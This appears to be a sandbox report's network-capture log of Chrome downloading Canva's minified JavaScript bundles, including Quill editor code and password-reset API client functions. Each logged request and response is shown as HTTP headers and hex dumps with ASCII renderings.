                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1369INData Raw: 22 3b 62 72 65 61 6b 20 61 3b 63 61 73 65 20 22 62 6f 6c 64 22 3a 61 3d 22 42 6f 6c 64 22 3b 62 72 65 61 6b 20 61 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 5f 5f 63 2e 42 28 61 29 3b 7d 72 65 74 75 72 6e 20 43 69 5b 60 74 65 78 74 24 7b 61 7d 24 7b 7a 71 61 28 62 29 7d 60 5d 7d 3b 0a 5f 5f 63 2e 41 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 3d 22 6d 65 64 69 75 6d 22 29 7b 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 20 22 78 78 6c 61 72 67 65 22 3a 72 65 74 75 72 6e 22 68 31 22 3b 63 61 73 65 20 22 78 6c 61 72 67 65 22 3a 72 65 74 75 72 6e 22 68 31 22 3b 63 61 73 65 20 22 6c 61 72 67 65 22 3a 72 65 74 75 72 6e 22 68 32 22 3b 63 61 73 65 20 22 6d 65 64 69 75 6d 22 3a 72 65 74 75 72 6e 22 68 33 22 3b 63 61 73 65 20 22 73 6d 61 6c 6c 22 3a 72 65 74
                                                                                                                                                                                                                                                                    Data Ascii: ";break a;case "bold":a="Bold";break a;default:throw new __c.B(a);}return Ci[`text${a}${zqa(b)}`]};__c.Aqa=function(a="medium"){switch(a){case "xxlarge":return"h1";case "xlarge":return"h1";case "large":return"h2";case "medium":return"h3";case "small":ret
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1369INData Raw: 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 6d 6f 76 65 22 2c 74 68 69 73 2e 6f 6e 4d 6f 75 73 65 4d 6f 76 65 2c 7b 63 61 70 74 75 72 65 3a 21 30 7d 29 3b 0a 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 75 70 22 2c 74 68 69 73 2e 6f 6e 4d 6f 75 73 65 55 70 2c 7b 63 61 70 74 75 72 65 3a 21 30 7d 29 3b 74 68 69 73 2e 6f 6e 50 6f 69 6e 74 65 72 44 6f 77 6e 28 76 69 28 65 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 7d 3b 74 68 69 73 2e 6f 6e 4d 6f 75 73 65 4d 6f 76 65 3d 65 3d 3e 7b 74 68 69 73 2e 6f 6e 50 6f 69 6e 74 65 72 4d 6f 76 65 28 76 69 28 65 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 29 7d 3b 74 68 69 73 2e 6f 6e
                                                                                                                                                                                                                                                                    Data Ascii: his.element.ownerDocument;f.addEventListener("mousemove",this.onMouseMove,{capture:!0});f.addEventListener("mouseup",this.onMouseUp,{capture:!0});this.onPointerDown(vi(e,this.element))};this.onMouseMove=e=>{this.onPointerMove(vi(e,this.element))};this.on
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1369INData Raw: 3b 74 68 69 73 2e 6f 6e 50 6f 69 6e 74 65 72 43 61 6e 63 65 6c 3d 0a 65 3b 74 68 69 73 2e 6f 6e 54 6f 75 63 68 4d 6f 76 65 3d 66 3d 3e 7b 63 6f 6e 73 74 20 67 3d 74 68 69 73 2e 67 57 28 66 29 3b 69 66 28 67 29 74 68 69 73 2e 6f 6e 50 6f 69 6e 74 65 72 4d 6f 76 65 28 77 69 28 66 2c 67 29 29 7d 3b 74 68 69 73 2e 6f 6e 54 6f 75 63 68 45 6e 64 3d 66 3d 3e 7b 63 6f 6e 73 74 20 67 3d 74 68 69 73 2e 67 57 28 66 29 3b 67 26 26 28 74 68 69 73 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 2c 74 68 69 73 2e 6f 6e 50 6f 69 6e 74 65 72 55 70 28 77 69 28 66 2c 67 29 29 29 7d 3b 74 68 69 73 2e 6f 6e 54 6f 75 63 68 43 61 6e 63 65 6c 3d 66 3d 3e 7b 63 6f 6e 73 74 20 67 3d 74 68 69 73 2e 67 57 28 66 29 3b 67 26 26 28 74 68 69 73 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 2c 74 68 69
                                                                                                                                                                                                                                                                    Data Ascii: ;this.onPointerCancel=e;this.onTouchMove=f=>{const g=this.gW(f);if(g)this.onPointerMove(wi(f,g))};this.onTouchEnd=f=>{const g=this.gW(f);g&&(this.disconnect(),this.onPointerUp(wi(f,g)))};this.onTouchCancel=f=>{const g=this.gW(f);g&&(this.disconnect(),thi
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1369INData Raw: 20 63 20 6f 66 20 74 68 69 73 2e 72 71 29 6e 75 6c 6c 3d 3d 3d 28 61 3d 63 2e 6f 6e 50 6f 69 6e 74 65 72 4d 6f 76 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 63 61 6c 6c 28 63 2c 62 2c 74 68 69 73 2e 59 74 29 3b 66 6f 72 28 63 6f 6e 73 74 20 63 20 6f 66 20 62 29 63 2e 6a 65 3d 63 2e 63 75 72 72 65 6e 74 7d 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 2c 63 29 7b 5f 5f 63 2e 4a 69 2e 46 28 74 68 69 73 29 3b 74 68 69 73 2e 49 41 61 3d 62 3b 74 68 69 73 2e 24 61 61 3d 63 3b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 3b 74 68 69 73 2e 59 74 3d 6e 65 77 20 4d 61 70 3b 74 68 69 73 2e 68 63 61 3d 6e 65 77 20 53 65 74 3b 74 68 69 73 2e 42 35 3d 30 3b 74 68 69 73 2e 61 63 74 69 6f 6e 73 3d 6e 65 77 20 53 65 74 3b 74 68 69 73
                                                                                                                                                                                                                                                                    Data Ascii: c of this.rq)null===(a=c.onPointerMove)||void 0===a?void 0:a.call(c,b,this.Yt);for(const c of b)c.je=c.current}}constructor(a,b,c){__c.Ji.F(this);this.IAa=b;this.$aa=c;this.element=null;this.Yt=new Map;this.hca=new Set;this.B5=0;this.actions=new Set;this
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1369INData Raw: 2c 63 6f 6c 6f 72 54 79 70 6f 67 72 61 70 68 79 54 65 72 74 69 61 72 79 3a 22 76 61 72 28 2d 2d 4a 45 41 71 50 77 29 22 2c 74 69 6e 79 4d 75 6c 74 69 70 6c 69 65 72 3a 22 31 2e 35 22 2c 73 6d 61 6c 6c 4d 75 6c 74 69 70 6c 69 65 72 3a 22 32 22 2c 6d 65 64 69 75 6d 4d 75 6c 74 69 70 6c 69 65 72 3a 22 33 22 2c 6c 61 72 67 65 4d 75 6c 74 69 70 6c 69 65 72 3a 22 34 22 2c 74 69 6e 79 53 69 7a 65 3a 22 31 32 70 78 22 2c 73 6d 61 6c 6c 53 69 7a 65 3a 22 31 36 70 78 22 2c 6d 65 64 69 75 6d 53 69 7a 65 3a 22 32 34 70 78 22 2c 6c 61 72 67 65 53 69 7a 65 3a 22 33 32 70 78 22 2c 69 63 6f 6e 3a 22 64 6b 57 79 70 77 22 2c 74 69 6e 79 3a 22 52 33 42 55 70 77 20 64 6b 57 79 70 77 22 2c 73 6d 61 6c 6c 3a 22 75 52 57 78 56 41 20 64 6b 57 79 70 77 22 2c 6d 65 64 69 75 6d 3a
                                                                                                                                                                                                                                                                    Data Ascii: ,colorTypographyTertiary:"var(--JEAqPw)",tinyMultiplier:"1.5",smallMultiplier:"2",mediumMultiplier:"3",largeMultiplier:"4",tinySize:"12px",smallSize:"16px",mediumSize:"24px",largeSize:"32px",icon:"dkWypw",tiny:"R3BUpw dkWypw",small:"uRWxVA dkWypw",medium:
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC1369INData Raw: 67 3e 27 3b 76 61 72 20 53 71 61 3d 27 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 30 2e 33 39 36 20 39 2e 30 35 37 20 36 2e 39 31 20 32 2e 30 36 61 31 2e 30 32 32 20 31 2e 30 32 32 20 30 20 30 20 30 2d 31 2e 38 32 33 20 30 4c 31 2e 36 30 35 20 39 2e 30 35 37 61 2e 39 39 2e 39 39 20 30 20 30 20 30 2d 2e 31 30 34 2e 34 34 31 63 30 20 2e 35 35 34 2e 34 35 35 20 31 2e 30
                                                                                                                                                                                                                                                                    Data Ascii: g>';var Sqa='<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12" fill="none"><path fill="currentColor" fill-rule="evenodd" d="M10.396 9.057 6.91 2.06a1.022 1.022 0 0 0-1.823 0L1.605 9.057a.99.99 0 0 0-.104.441c0 .554.455 1.0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    65192.168.2.1249789104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC807OUTGET /chunk-batch/d2858d877c79e696.js+6df21c0ad726f56e.vendor.js+d9c3325fa20c5077.js+1af3845752268f2b.js+73112b4e8057cf9b.strings.js+e95df303e00e9086.js+36a39abacef2de2d.js+51a65bea267f0a65.js+4270be5a3621855a.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1149INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:42 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 363712
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59511f29ec1849-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49982
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:28 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:23 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: +HayqgXCcSs4RHAH8yGibc1nnHXgI5M0Q/ur/i42GFFNkhoc78eqxmq2jIOno/71CBM97tZPvZY=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8GZKXDG6V4SK65
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: rLfmBkhqhiVtIBleJLRlGivQLOzaVdmK
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC366INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 75 69 43 6c 74 50 64 25 32 42 73 4d 67 65 35 55 54 61 6c 77 6b 79 33 49 33 51 4d 50 74 48 50 44 34 69 4d 49 6a 6a 34 45 42 52 75 67 4f 25 32 42 36 53 4f 55 6a 34 45 4c 51 34 4f 37 50 62 73 48 6c 30 55 63 77 6a 49 57 32 4e 38 4c 4a 6a 54 49 6d 31 31 37 45 42 42 53 75 32 72 70 51 30 69 6d 36 41 49 6e 70 71 56 49 35 74 70 52 6a 69 4e 44 47 6a 36 64 58 4b 33 6c 4e 48 74 59 52 69 37 4e 55 43 63 57 4f 7a 25 32 42 70 44 54 47 54 61 25 32 46 58 56 52 25 32 42 59 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uiCltPd%2BsMge5UTalwky3I3QMPtHPD4iMIjj4EBRugO%2B6SOUj4ELQ4O7PbsHl0UcwjIW2N8LJjTIm117EBBSu2rpQ0im6AInpqVI5tpRjiNDGj6dXK3lNHtYRi7NUCcWOz%2BpDTGTa%2FXVR%2BY%3D"}],"group":"cf-nel",
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 3b 2f 2f 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 64 32 38 35 38 64 38 37 37 63 37 39 65 36 39 36 2e 6a 73 0a 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 37 39 30 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 32 32 38 30 34 33 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f
                                                                                                                                                                                                                                                                    Data Ascii: ;// __FILE_CONTENT_FOR__:d2858d877c79e696.js(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[3790],{/***/ 228043:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 6f 72 64 72 65 73 65 74 22 5d 29 3b 5f 5f 63 2e 61 7a 28 62 2c 7b 63 6f 64 65 3a 5f 5f 63 2e 41 28 61 2e 63 6f 64 65 2c 22 53 65 6e 64 50 61 73 73 77 6f 72 64 52 65 73 65 74 43 6f 64 65 41 70 69 52 65 71 75 65 73 74 23 63 6f 64 65 20 72 65 71 75 69 72 65 64 22 29 2c 61 63 74 69 6f 6e 3a 61 2e 61 63 74 69 6f 6e 7d 29 3b 62 3d 64 7a 28 62 29 3b 63 6f 6e 73 74 20 5b 63 2c 7b 65 36 61 3a 64 7d 5d 3d 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 74 68 69 73 2e 65 62 2e 70 6f 73 74 28 62 2c 5f 5f 63 2e 5a 4f 61 2e 73 65 72 69 61 6c 69 7a 65 28 61 2e 62 6f 64 79 29 2c 7b 5a 63 3a 22 73 65 6e 64 70 61 73 73 77 6f 72 64 72 65 73 65 74 63 6f 64 65 61 70 69 22 7d 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6d 65 28 31 34 33 34 33 33
                                                                                                                                                                                                                                                                    Data Ascii: ordreset"]);__c.az(b,{code:__c.A(a.code,"SendPasswordResetCodeApiRequest#code required"),action:a.action});b=dz(b);const [c,{e6a:d}]=await Promise.all([this.eb.post(b,__c.ZOa.serialize(a.body),{Zc:"sendpasswordresetcodeapi"}),__webpack_require__.me(143433
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 61 63 74 69 6f 6e 7d 29 3b 62 3d 64 7a 28 62 29 3b 63 6f 6e 73 74 20 5b 63 2c 7b 58 35 61 3a 64 7d 5d 3d 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 74 68 69 73 2e 65 62 2e 70 6f 73 74 28 62 2c 0a 5f 5f 63 2e 6a 7a 2e 73 65 72 69 61 6c 69 7a 65 28 61 2e 62 6f 64 79 29 2c 7b 5a 63 3a 22 72 65 73 65 74 70 61 73 73 77 6f 72 64 61 70 69 22 7d 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6d 65 28 31 34 33 34 33 33 29 2e 74 68 65 6e 28 28 29 3d 3e 28 7b 58 35 61 3a 5f 5f 63 2e 50 56 62 7d 29 29 5d 29 3b 72 65 74 75 72 6e 20 64 2e 64 65 73 65 72 69 61 6c 69 7a 65 28 63 29 7d 61 73 79 6e 63 20 5a 4d 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 3d 62 26 26 62 2e 4e 26 26 74 68 69 73 2e 6e 61 26 26 74 68 69 73 2e 6e 61 2e 49 66 28 22 73
                                                                                                                                                                                                                                                                    Data Ascii: action});b=dz(b);const [c,{X5a:d}]=await Promise.all([this.eb.post(b,__c.jz.serialize(a.body),{Zc:"resetpasswordapi"}),__webpack_require__.me(143433).then(()=>({X5a:__c.PVb}))]);return d.deserialize(c)}async ZM(a,b){const c=b&&b.N&&this.na&&this.na.If("s
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 36 66 35 36 65 2e 76 65 6e 64 6f 72 2e 6a 73 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 36 64 66 32 31 63 30 61 64 37 32 36 66 35 36 65 2e 76 65 6e 64 6f 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 31 5d 2c 7b 39 36 38 3a 74 3d 3e 7b 76 61 72 20 65 3b 77 69 6e 64 6f 77 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d
                                                                                                                                                                                                                                                                    Data Ascii: 6f56e.vendor.js/*! For license information please see 6df21c0ad726f56e.vendor.js.LICENSE.txt */(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[131],{968:t=>{var e;window,e=function(){return function(t){var e={};function n(r){if(e[r]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 33 29 2c 68 3d 6e 28 39 29 2c 70 3d 6e 28 36 29 2c 64 3d 6e 28 32 35 29 2c 79 3d 6e 28 31 31 29 2c 76 3d 6e 28 32 30 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 74 29 7b 72 65 74 75 72 6e 20 62 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 74 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22
                                                                                                                                                                                                                                                                    Data Ascii: 3),h=n(9),p=n(6),d=n(25),y=n(11),v=n(20);function b(t){return b="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 65 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 72 2e 6b 65 79 2c 72 29 7d 7d 76 61 72 20 4f 3d 4f 62 6a 65 63 74 28 79 2e 61 29 28 22 71 75 69 6c 6c 22 29 2c 6a 3d 6e 65 77 20 73 2e 52 65 67 69 73 74 72 79 3b 73 2e 50 61 72 65 6e 74 42 6c 6f 74 2e 75 69 43 6c 61 73 73 3d 22 71 6c 2d 75 69 22 3b 76 61 72 20 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 6e
                                                                                                                                                                                                                                                                    Data Ascii: var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}var O=Object(y.a)("quill"),j=new s.Registry;s.ParentBlot.uiClass="ql-ui";var N=function(){function t(e){var n
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 74 28 29 2c 74 68 69 73 2e 65 6d 69 74 74 65 72 2e 6f 6e 28 66 2e 61 2e 65 76 65 6e 74 73 2e 45 44 49 54 4f 52 5f 43 48 41 4e 47 45 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 3d 3d 3d 66 2e 61 2e 65 76 65 6e 74 73 2e 54 45 58 54 5f 43 48 41 4e 47 45 26 26 6e 2e 72 6f 6f 74 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 71 6c 2d 62 6c 61 6e 6b 22 2c 6e 2e 65 64 69 74 6f 72 2e 69 73 42 6c 61 6e 6b 28 29 29 7d 29 29 2c 74 68 69 73 2e 65 6d 69 74 74 65 72 2e 6f 6e 28 66 2e 61 2e 65 76 65 6e 74 73 2e 53 43 52 4f 4c 4c 5f 55 50 44 41 54 45 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 76 61 72 20 6f 3d 6e 2e 73 65 6c 65 63 74 69 6f 6e 2e 6c 61 73 74 52 61 6e 67 65 2c 69 3d 67 28 6e 2e 73 65 6c 65 63 74 69 6f 6e 2e 67 65 74 52 61 6e 67 65 28
                                                                                                                                                                                                                                                                    Data Ascii: t(),this.emitter.on(f.a.events.EDITOR_CHANGE,(function(t){t===f.a.events.TEXT_CHANGE&&n.root.classList.toggle("ql-blank",n.editor.isBlank())})),this.emitter.on(f.a.events.SCROLL_UPDATE,(function(t,e,r){var o=n.selection.lastRange,i=g(n.selection.getRange(
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 65 61 64 4f 6e 6c 79 45 64 69 74 73 3d 21 31 2c 65 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 61 62 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 21 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 7c 7c 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3b 74 68 69 73 2e 73 63 72 6f 6c 6c 2e 65 6e 61 62 6c 65 28 74 29 2c 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 71 6c 2d 64 69 73 61 62 6c 65 64 22 2c 21 74 29 7d 7d 2c 7b 6b 65 79 3a 22 66 6f 63 75 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 73 63 72 6f 6c 6c 69 6e 67 43 6f 6e 74 61 69 6e 65 72 2e 73 63 72 6f 6c
                                                                                                                                                                                                                                                                    Data Ascii: eadOnlyEdits=!1,e}},{key:"enable",value:function(){var t=!(arguments.length>0&&void 0!==arguments[0])||arguments[0];this.scroll.enable(t),this.container.classList.toggle("ql-disabled",!t)}},{key:"focus",value:function(){var t=this.scrollingContainer.scrol
                                                                                                                                                                                                                                                                    2024-11-20 15:01:43 UTC1369INData Raw: 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 7b 62 6f 74 74 6f 6d 3a 65 2e 62 6f 74 74 6f 6d 2d 72 2e 74 6f 70 2c 68 65 69 67 68 74 3a 65 2e 68 65 69 67 68 74 2c 6c 65 66 74 3a 65 2e 6c 65 66 74 2d 72 2e 6c 65 66 74 2c 72 69 67 68 74 3a 65 2e 72 69 67 68 74 2d 72 2e 6c 65 66 74 2c 74 6f 70 3a 65 2e 74 6f 70 2d 72 2e 74 6f 70 2c 77 69 64 74 68 3a 65 2e 77 69 64 74 68 7d 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 43 6f 6e 74 65 6e 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 30
                                                                                                                                                                                                                                                                    Data Ascii: this.container.getBoundingClientRect();return{bottom:e.bottom-r.top,height:e.height,left:e.left-r.left,right:e.right-r.left,top:e.top-r.top,width:e.width}}},{key:"getContents",value:function(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    66192.168.2.1249790104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:42 UTC615OUTGET /web/e5f78acafec3a6c5.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
